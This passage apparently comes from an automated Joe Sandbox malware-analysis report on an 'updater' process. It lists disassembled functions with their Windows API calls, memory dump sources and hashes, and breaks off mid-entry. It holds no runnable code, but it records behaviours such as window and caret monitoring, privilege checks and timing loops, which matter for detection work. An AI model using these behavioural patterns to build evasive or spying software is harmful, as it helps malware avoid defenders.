GetStringTypeA.KERNEL32(00000C00,00000002,?,00000080,?), ref: 017B88C7
GetThreadLocale.KERNEL32 ref: 017B87F7

Part of subcall function 017B8755: GetCPInfo.KERNEL32(00000000,?), ref: 017B876E

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: InfoLocaleStringThreadType
String ID:
API String ID: 1505017576-0
Opcode ID: 4f2c443fc093c4a626cddbbd6346b2c522781029e28b123e84948a86cf7b3ed4
Instruction ID: e4c4b81ce8b50c8314b8a652663b96162a60e8ee16a9db11e25a746c47478bdc
Opcode Fuzzy Hash: 4f2c443fc093c4a626cddbbd6346b2c522781029e28b123e84948a86cf7b3ed4
Instruction Fuzzy Hash: 9A310A21548356DFE722DB68B481BFBFF9DAB15324F08C09DD54C8B28AEB7486448763

Function 00BE63F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00BE642B
__isleadbyte_l.LIBCMT ref: 00BE6459
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00BE6487
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00BE64BD

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 3e6b1addb7ac789993024ace2285b7220987b6d86274ac149c56a2ea2e7b5128
Instruction ID: 2dfd5af19fd85787cdd72a91103fac7fce172c06809aaec74d62c961717a5f18
Opcode Fuzzy Hash: 3e6b1addb7ac789993024ace2285b7220987b6d86274ac149c56a2ea2e7b5128
Instruction Fuzzy Hash: 1831B031600296AFDB218F66CC85BAA7FF5FF513A0F1540A9E864872D1EB31ED50DB50

Function 00C3552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00C3553F

Part of subcall function 00C13B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C13B4E
Part of subcall function 00C13B34: GetCurrentThreadId.KERNEL32 ref: 00C13B55
Part of subcall function 00C13B34: AttachThreadInput.USER32(00000000,?,00C155C0), ref: 00C13B5C

GetCaretPos.USER32(?), ref: 00C35550
ClientToScreen.USER32(00000000,?), ref: 00C3558B
GetForegroundWindow.USER32 ref: 00C35591

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 15d7fe7e235fa9f8908f94fc8ae85fb4e0b11d31925298642e3679df1cca8222
Instruction ID: 679af7700c5a6c0930f124c8f65608e992898241473d932107648cf03358b04b
Opcode Fuzzy Hash: 15d7fe7e235fa9f8908f94fc8ae85fb4e0b11d31925298642e3679df1cca8222
Instruction Fuzzy Hash: F2313071D00108AFDB00EFB5D885AEFB7F9EF55304F10446AE515E7242EBB5AE408BA0

Function 00C3CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BB29F3

GetCursorPos.USER32(?), ref: 00C3CB7A
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00BEBCEC,?,?,?,?,?), ref: 00C3CB8F
GetCursorPos.USER32(?), ref: 00C3CBDC
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00BEBCEC,?,?,?), ref: 00C3CC16

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 959928a8df8aa26a887f9b0e50f45cfe439cd31f87094101a3d097516d4e8e1a
Instruction ID: 516b1162d3063730ca7d1c07fedc8cb570fa05e26ca383745982de276db6c0ac
Opcode Fuzzy Hash: 959928a8df8aa26a887f9b0e50f45cfe439cd31f87094101a3d097516d4e8e1a
Instruction Fuzzy Hash: 5631BD35610018AFCB158F59C889EFEBBB5FB0A310F1440A9F919AB261C3319E50EFA0

Function 00BD0BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00BD0BE2

Part of subcall function 00BC402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C17E51,?,?,00000000), ref: 00BC4041
Part of subcall function 00BC402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C17E51,?,?,00000000,?,?), ref: 00BC4065

_fprintf.LIBCMT ref: 00BD0C19
OutputDebugStringW.KERNEL32(?), ref: 00C0694C

Part of subcall function 00BD4CCA: _flsall.LIBCMT ref: 00BD4CE3

__setmode.LIBCMT ref: 00BD0C4E

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 517c43e9793d6dae9655cc019537e547f3f16eb55dd515f3ce814c11d065dec8
Instruction ID: 2546db44e2a37d89da24472e5f82fdf820af2eb14b099412ac429bc6e0258ee0
Opcode Fuzzy Hash: 517c43e9793d6dae9655cc019537e547f3f16eb55dd515f3ce814c11d065dec8
Instruction Fuzzy Hash: 7A11D571A041046BD708B7A4AC47BBEBBA9EF41321F1401EBF214563C2EF715D9697A1

Function 00C09274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C08D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C08D3F
Part of subcall function 00C08D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C08D49
Part of subcall function 00C08D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C08D58
Part of subcall function 00C08D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C08D5F
Part of subcall function 00C08D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C08D75

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C092C1
_memcmp.LIBCMT ref: 00C092E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C0931A
HeapFree.KERNEL32(00000000), ref: 00C09321

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 88383708a38db24c9583b3f5206868e69f306719142bd972ede485db7a9bdd5a
Instruction ID: cd73e91b479218f6a0470ea3e71faeff866c6261cc4fea323c964d0ca8f1cb99
Opcode Fuzzy Hash: 88383708a38db24c9583b3f5206868e69f306719142bd972ede485db7a9bdd5a
Instruction Fuzzy Hash: 5B21AF71E40109EFDB10DFA4C945BEEB7B8FF45301F144059E895A72A2D770AA05CF90

Function 00C3634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00C363BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C363D7
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C363E5
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00C363F3

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 1248f50bd6969e874967ed4b3416013c16178c5b4a4ebeee4aa6f8127c5f2602
Instruction ID: 1451a1bb4da07ec2e87300234abdbc2e18cb1f2315f362187c9a2a8bd860b7be
Opcode Fuzzy Hash: 1248f50bd6969e874967ed4b3416013c16178c5b4a4ebeee4aa6f8127c5f2602
Instruction Fuzzy Hash: D011E135354414AFD704AB24CC44FBE7799EF46320F148118FA26CB2E2CBB0AD00CB95

Function 00C0E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C0F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C0E46F,?,?,?,00C0F262,00000000,000000EF,00000119,?,?), ref: 00C0F867
Part of subcall function 00C0F858: lstrcpyW.KERNEL32(00000000,?,?,00C0E46F,?,?,?,00C0F262,00000000,000000EF,00000119,?,?,00000000), ref: 00C0F88D
Part of subcall function 00C0F858: lstrcmpiW.KERNEL32(00000000,?,00C0E46F,?,?,?,00C0F262,00000000,000000EF,00000119,?,?), ref: 00C0F8BE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C0F262,00000000,000000EF,00000119,?,?,00000000), ref: 00C0E488
lstrcpyW.KERNEL32(00000000,?,?,00C0F262,00000000,000000EF,00000119,?,?,00000000), ref: 00C0E4AE
lstrcmpiW.KERNEL32(00000002,cdecl,?,00C0F262,00000000,000000EF,00000119,?,?,00000000), ref: 00C0E4E2

Strings

cdecl, xrefs: 00C0E4D9

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 206a3db86b6f751bd4541b8e8155dfa78acc00f1ed2300d0e482cca2173b104e
Instruction ID: a2b773b73a9a117ba291fd0cd38ea5e11305e2e3eb5d312ff4831ca248630d51
Opcode Fuzzy Hash: 206a3db86b6f751bd4541b8e8155dfa78acc00f1ed2300d0e482cca2173b104e
Instruction Fuzzy Hash: 2C11D03A200345AFDB25AFA4DC45E7E77A8FF46350B50842AF916CB2E0EB719940DB91

Function 00BE5312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BE5331

Part of subcall function 00BD593C: __FF_MSGBANNER.LIBCMT ref: 00BD5953
Part of subcall function 00BD593C: __NMSG_WRITE.LIBCMT ref: 00BD595A
Part of subcall function 00BD593C: RtlAllocateHeap.NTDLL(01710000,00000000,00000001,?,00000004,?,?,00BD1003,?), ref: 00BD597F

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 609a3fe648bef7ca823d3eeead5c263a160ad08e732876de9e2801ae40a04947
Instruction ID: 6b7d355df79e6a823a395cafdc185a00530545c5762717fa6194fab7808c51d8
Opcode Fuzzy Hash: 609a3fe648bef7ca823d3eeead5c263a160ad08e732876de9e2801ae40a04947
Instruction Fuzzy Hash: 05112B31405E45AFCB302F71AC4175E7BD4AF113A5F2005EBF50A962E1EFB089408754

Function 00C14365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C14385
_memset.LIBCMT ref: 00C143A6
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00C143F8
CloseHandle.KERNEL32(00000000), ref: 00C14401

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 8ad2fffcd705d577050765362cd3fc156ee191a87e03527469342713ed08ed2d
Instruction ID: b76fdef970a89948ea491dfdfe98e8569a51724cdf8019f98fdd5acb820bcb5c
Opcode Fuzzy Hash: 8ad2fffcd705d577050765362cd3fc156ee191a87e03527469342713ed08ed2d
Instruction Fuzzy Hash: E4110D759412287AD7309BA5AC4DFEFBB7CEF45720F10459AF918E7190D2704F808BA4

Function 00C26A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C17E51,?,?,00000000), ref: 00BC4041
Part of subcall function 00BC402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C17E51,?,?,00000000,?,?), ref: 00BC4065

gethostbyname.WSOCK32(?,?,?), ref: 00C26A84
WSAGetLastError.WSOCK32(00000000), ref: 00C26A8F
_memmove.LIBCMT ref: 00C26ABC
inet_ntoa.WSOCK32(?), ref: 00C26AC7

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: bcffdc738205175afe3b264e130a354d4749a56699d55e2041b2842dd46b72f1
Instruction ID: 3898392dd81d74d277bd3f304115ebcc586ff3610c2f370b3d2e37f9eabff24c
Opcode Fuzzy Hash: bcffdc738205175afe3b264e130a354d4749a56699d55e2041b2842dd46b72f1
Instruction Fuzzy Hash: F1115176540108AFCB04EBA4DD56EEEB7F8FF15310B1440A5F506A72A2DF31AE14DBA1

Function 00C096F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00C09719
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C0972B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C09741
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C0975C

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: af49d9793f5265ea332c4d89c7c42b4611da370513b5d0111f1a01c8536caaed
Instruction ID: 43c5aa62dfe6d2ac7904800435d1bccfc7e7d82d6d721773038aecd5caf2d833
Opcode Fuzzy Hash: af49d9793f5265ea332c4d89c7c42b4611da370513b5d0111f1a01c8536caaed
Instruction Fuzzy Hash: AF11483A901218FFEB10DF99C984F9DBBB8FB48710F204091EA04B7290D671AE10DB90

Function 00BB166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00BB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BB29F3

DefDlgProcW.USER32(?,00000020,?), ref: 00BB16B4
GetClientRect.USER32(?,?), ref: 00BEB93C
GetCursorPos.USER32(?), ref: 00BEB946
ScreenToClient.USER32(?,?), ref: 00BEB951

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 5020033a1e744267b5f0dc9bb990d87dfc4df43aa3ae4564b9c0e1a8377b97a6
Instruction ID: dca98d9ca5715f60de5e90cea289b8d36f68035751a783663a14f80558f4b8b9
Opcode Fuzzy Hash: 5020033a1e744267b5f0dc9bb990d87dfc4df43aa3ae4564b9c0e1a8377b97a6
Instruction Fuzzy Hash: 42112879A00019ABCB00EF98C895EFE77F8FB09301F540895FA52E7150D770BA51CBA5

Function 017AE84B Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(017CC325), ref: 017AE864
RtlEnterCriticalSection.NTDLL(017CC325), ref: 017AE877
LocalAlloc.KERNEL32(00000000,00000FF8,00000000,017AE915), ref: 017AE8A1
RtlLeaveCriticalSection.NTDLL(017CC325), ref: 017AE90F

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 059cd267ea006de60a5320f33f08991f627d23d25d4d82a098d16e9fb1738213
Instruction ID: c978304de7c7a39b3a0bde9cef70e1f57cf7f5c0987b4f32d2f97ecad81b3b23
Opcode Fuzzy Hash: 059cd267ea006de60a5320f33f08991f627d23d25d4d82a098d16e9fb1738213
Instruction Fuzzy Hash: E711B670A48240DFE717EF69E509719FBE4E78A700F9081ADE10487249CE705B408763

Function 017AE84D Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(017CC325), ref: 017AE864
RtlEnterCriticalSection.NTDLL(017CC325), ref: 017AE877
LocalAlloc.KERNEL32(00000000,00000FF8,00000000,017AE915), ref: 017AE8A1
RtlLeaveCriticalSection.NTDLL(017CC325), ref: 017AE90F

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 452e45c7f64f678ee554e12821b8de4994145656e070d4e9f58b0ad65e9bcc6d
Instruction ID: 300517c73c456b51ed0247745917fd85a5d504f9820c8ac892b3a9c80bf554a6
Opcode Fuzzy Hash: 452e45c7f64f678ee554e12821b8de4994145656e070d4e9f58b0ad65e9bcc6d
Instruction Fuzzy Hash: A111B670A48240DFD717EF69E509719FBE4E78A700F9081ADE10487249CE705B408763

Function 00BB2111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BB214F
GetStockObject.GDI32(00000011), ref: 00BB2163
SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB216D

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 1725d13df029820be1d15b6cad78f0cf99e4b6f5aaf257bcda88926203080523
Instruction ID: 8fcd56b580ce6957443c83828770d9bf029011a252179675d5b3fb94faadd5f3
Opcode Fuzzy Hash: 1725d13df029820be1d15b6cad78f0cf99e4b6f5aaf257bcda88926203080523
Instruction Fuzzy Hash: DC1179B2501549BFDB024F94DC84FEA7BA9FF59394F150145FB0466120C7719C609BA1

Function 00C11941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C104EC,?,00C1153F,?,00008000), ref: 00C1195E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00C104EC,?,00C1153F,?,00008000), ref: 00C11983
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C104EC,?,00C1153F,?,00008000), ref: 00C1198D
Sleep.KERNEL32(?,?,?,?,?,?,?,00C104EC,?,00C1153F,?,00008000), ref: 00C119C0

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: f4781e9cf85fb90846de279fc310993a886ee9e46783622de9b4d14cc2f28281
Instruction ID: 287defbf1cefed895f7fe864a786d6877982f8e6b1adc5531b01d29a99270355
Opcode Fuzzy Hash: f4781e9cf85fb90846de279fc310993a886ee9e46783622de9b4d14cc2f28281
Instruction Fuzzy Hash: BC115A31C0051DDBCF00DFA5D998BEEBB78FF0A701F044046EE90B2240CB3496A09B95

Function 00C3E1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs
